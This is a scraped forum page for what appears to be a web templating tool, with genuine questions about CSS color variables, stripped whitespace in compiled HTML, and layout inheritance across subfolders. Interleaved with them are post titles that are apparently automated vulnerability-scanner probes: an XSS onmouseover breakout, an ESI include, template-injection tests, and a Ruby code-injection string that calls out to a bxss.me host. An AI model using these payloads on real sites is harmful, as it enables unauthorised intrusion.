Discussions

Ask a Question

Mr.\u0022onmouseover=6Auk(9353)\u0022

555

acux2776%C0%BEz1%C0%BCz2a%90bcxuca2776

555
ANSWERED

color palette?

Hi. My team and I are working on a big site and we want to enforce branding, including choice of colors. I know how to make a hex color into a variable, but is there a way to pop up a menu of all (color) variables defined in the CSS, and choose one from the menu? Thanks

why does it remove my white spaces

Hi if have got the follow html. <div translate="no" typeof="schema:PostalAddress"> <span property="schema:name">{{ store.store.name }}</span><br /> <span property="schema:streetAddress">{{ store.store.address.street }}</span><br /> <span property="schema:postalCode">{{ store.store.address.zipcode }}</span> <span property="schema:addressLocality">{{ store.store.address.place }}</span><br /> <span property="schema:addressCountry">{{ store.store.address.country }}</span><br /> {{ store.store.address.phone }}<br /> <a href="mailto:{{ store.store.address.email }}">{{ store.store.address.email }}</a><br /> </div> I put a space between 2 elements tag when i compile te spaces are removed. this is also if i put there &nbsp; What do i need to do to get this fixed

Mr.<esi:include src="http://bxss.me/rpb.png"/>

555

acu3996<s1﹥s2ʺs3ʹuca3996

555

Mr."onmouseover=6Auk(9242)"

555

'+'A'.concat(70-3).concat(22*4).concat(117).concat(74).concat(103).concat(86)+(require'socket' Socket.gethostbyname('hitus'+'kghjzpbr519ae.bxss.me.')[3].to_s)+'

555

Mr.nk2ws{{1==1}}epb4g

555
ANSWERED

Layout extending layout with subfolders

Hi, another question. The current code can be found at https://github.com/obcode/ob.cs.hm.edu/tree/spike I want to generate some pages in a subfolder `lectures`. These files start with extends(src='../withPortfolio.sgr') `withPortfolio.sgr` starts with extends(src='layout.sgr') Without subdirs everything is working, but now I get: ModuleBuildError: Module build failed: Error: ENOENT: no such file or directory, open '.../views/lectures/layout.sgr' which is quite clear for me, but I am looking for a solution how I can generate pages top-level and inside a subfolder `lectures` with the same layouts.